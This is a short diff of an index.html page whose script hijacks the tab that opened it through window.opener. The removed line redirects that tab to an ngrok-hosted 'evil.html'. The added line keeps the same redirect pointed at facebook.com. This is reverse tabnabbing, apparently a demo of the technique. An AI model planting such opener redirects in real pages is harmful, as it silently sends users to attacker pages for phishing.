--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 <body>
 <script>
    if (window.opener) {
-      window.opener.location = "https://a23d008a7e0e.ngrok.io/evil.html";
+      window.opener.location = "www.facebook.com";
    }
   </script>
 
